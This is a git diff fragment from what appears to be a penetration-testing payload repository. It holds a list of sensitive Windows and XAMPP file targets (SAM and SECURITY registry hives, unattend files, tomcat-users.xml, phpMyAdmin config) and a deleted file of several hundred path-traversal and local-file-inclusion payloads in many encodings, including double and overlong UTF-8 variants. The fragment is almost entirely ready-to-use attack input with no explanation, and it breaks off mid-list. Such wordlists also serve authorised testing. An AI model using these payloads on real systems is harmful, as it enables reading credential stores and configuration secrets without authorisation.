-C:/windows/panther/unattend/sysprep.inf -C:/windows/panther/unattend/sysprep.xml -C:/windows/panther/unattend.txt -C:/windows/panther/unattend/unattended.txt -C:/windows/panther/unattend/unattended.xml -C:/windows/panther/unattend/unattend.txt -C:/windows/panther/unattend/unattend.xml -C:/windows/panther/unattend.xml -C:/windows/php.ini -C:/windows/repair/sam -C:/windows/repair/security -C:/windows/repair/software -C:/windows/repair/system -C:/windows/system32/config/appevent.evt -C:/windows/system32/config/default.sav -C:/windows/system32/config/regback/default -C:/windows/system32/config/regback/sam -C:/windows/system32/config/regback/security -C:/windows/system32/config/regback/software -C:/windows/system32/config/regback/system -C:/windows/system32/config/sam -C:/windows/system32/config/secevent.evt -C:/windows/system32/config/security.sav -C:/windows/system32/config/software.sav -C:/windows/system32/config/system -C:/windows/system32/config/system.sa -C:/windows/system32/config/system.sav -C:/windows/system32/drivers/etc/hosts -C:/windows/system32/eula.txt -C:/windows/system32/inetsrv/config/applicationhost.config -C:/windows/system32/inetsrv/config/schema/aspnet_schema.xml -C:/windows/system32/license.rtf -C:/windows/system32/logfiles/httperr/httperr1.log -C:/windows/system32/sysprep.inf -C:/windows/system32/sysprepsysprep.inf -C:/windows/system32/sysprep/sysprep.xml -C:/windows/system32/sysprepsysprep.xml -C:/windows/system32/sysprepunattended.txt -C:/windows/system32/sysprepunattended.xml -C:/windows/system32/sysprepunattend.txt -C:/windows/system32/sysprepunattend.xml -C:/windows/system32/sysprep.xml -C:/windows/system32/unattended.txt -C:/windows/system32/unattended.xml -C:/windows/system32/unattend.txt -C:/windows/system32/unattend.xml -C:/windows/system.ini -C:/windows/temp/ -C:/windows/windowsupdate.log -C:/windows/win.ini -C:/winnt/php.ini -C:/winnt/win.ini -C:/xampp/apache/bin/php.ini -C:/xampp/apache/conf/httpd.conf -C:/xampp/apache/logs/access.log -C:\xampp\apache\logs\access.log -C:\xampp\apache\logs\access_log -C:/xampp/apache/logs/error.log -C:\xampp\apache\logs\error.log -C:\xampp\apache\logs\error_log -C:/xampp/filezillaftp/filezilla server.xml -C:/xampp/filezillaftp/logs -C:/xampp/filezillaftp/logs/access.log -C:/xampp/filezillaftp/logs/error.log -C:/xampp/mercurymail/logs/access.log -C:/xampp/mercurymail/logs/error.log -C:/xampp/mercurymail/mercury.ini -C:/xampp/mysql/data/mysql.err -C:/xampp/phpmyadmin/config.inc -C:/xampp/phpmyadmin/config.inc.php -C:/xampp/phpmyadmin/phpinfo.php -C:/xampp/php/php.ini -C:/xampp/sendmail/sendmail.ini -C:/xampp/sendmail/sendmail.log -C:/xampp/tomcat/conf/tomcat-users.xml -C:/xampp/tomcat/conf/web.xml -C:/xampp/webalizer/webalizer.conf -C:/xampp/webdav/webdav.txt diff --git a/File Inclusion/Intruders/dot-slash-PathTraversal_and_LFI_pairing.txt b/File Inclusion/Intruders/dot-slash-PathTraversal_and_LFI_pairing.txt deleted file mode 100644 index 99b5166..0000000 --- a/File Inclusion/Intruders/dot-slash-PathTraversal_and_LFI_pairing.txt +++ /dev/null @@ -1,886 +0,0 @@ -../ -../../ -../../../ -../../../../ -../../../../../ -../../../../../../ -../../../../../../../ -../../../../../../../../ -../../../../../../../../../ -../../../../../../../../../../ -../../../../../../../../../../../ -../../../../../../../../../../../../ -../../../../../../../../../../../../../ -../../../../../../../../../../../../../../ -../../../../../../../../../../../../../../../ -/..%2f -/..%2f..%2f -/..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f -/%2e%2e/ -/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e%2f -/%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/..%252f -/..%252f..%252f -/..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f -/%252e%252e/ -/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e%252f -/%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/..\ -/..\..\ -/..\..\..\ -/..\..\..\..\ -/..\..\..\..\..\ -/..\..\..\..\..\..\ -/..\..\..\..\..\..\..\ -/..\..\..\..\..\..\..\..\ -/..%255c -/..%255c..%255c -/..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c -/..%5c..%5c -/..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c -/%2e%2e\ -/%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e%5c -/%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%252e%252e\ -/%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e%255c -/%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/..%c0%af -/..%c0%af..%c0%af -/..%c0%af..%c0%af..%c0%af -/..%c0%af..%c0%af..%c0%af..%c0%af -/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af -/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af -/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af -/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af -/%c0%ae%c0%ae/ -/%c0%ae%c0%ae/%c0%ae%c0%ae/ -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/ -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/ -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/ -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/ -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/ -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/ -/%c0%ae%c0%ae%c0%af -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af -/..%25c0%25af -/..%25c0%25af..%25c0%25af -/..%25c0%25af..%25c0%25af..%25c0%25af -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af -/%25c0%25ae%25c0%25ae/ -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/ -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/ -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/ -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/ -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/ -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/ -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/ -/%25c0%25ae%25c0%25ae%25c0%25af -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af -/..%c1%9c -/..%c1%9c..%c1%9c -/..%c1%9c..%c1%9c..%c1%9c -/..%c1%9c..%c1%9c..%c1%9c..%c1%9c -/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c -/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c -/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c -/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c -/%c0%ae%c0%ae\ -/%c0%ae%c0%ae\%c0%ae%c0%ae\ -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\ -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\ -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\ -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\ -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\ -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\ -/%c0%ae%c0%ae%c1%9c -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c -/..%25c1%259c -/..%25c1%259c..%25c1%259c -/..%25c1%259c..%25c1%259c..%25c1%259c -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c -/%25c0%25ae%25c0%25ae\ -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\ -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\ -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\ -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\ -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\ -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\ -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\ -/%25c0%25ae%25c0%25ae%25c1%259c -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c -/..%%32%66 -/..%%32%66..%%32%66 -/..%%32%66..%%32%66..%%32%66 -/..%%32%66..%%32%66..%%32%66..%%32%66 -/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66 -/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66 -/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66 -/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66 -/%%32%65%%32%65/ -/%%32%65%%32%65/%%32%65%%32%65/ -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/ -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/ -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/ -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/ -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/ -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/ -/%%32%65%%32%65%%32%66 -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66 -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66 -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66 -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66 -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66 -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66 -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66 -/..%%35%63 -/..%%35%63..%%35%63 -/..%%35%63..%%35%63..%%35%63 -/..%%35%63..%%35%63..%%35%63..%%35%63 -/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63 -/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63 -/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63 -/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63 -/%%32%65%%32%65/ -/%%32%65%%32%65/%%32%65%%32%65/ -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/ -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/ -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/ -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/ -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/ -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/ -/%%32%65%%32%65%%35%63 -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63 -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63 -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63 -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63 -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63 -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63 -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63 -/../ -/../../ -/../../../ -/../../../../ -/../../../../../ -/../../../../../../ -/../../../../../../../ -/../../../../../../../../ -/..%2f -/..%2f..%2f -/..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f -/%2e%2e/ -/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e%2f -/%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/..%252f -/..%252f..%252f -/..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f -/%252e%252e/ -/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e%252f -/%252e%252e%252f%252e%252e%252f 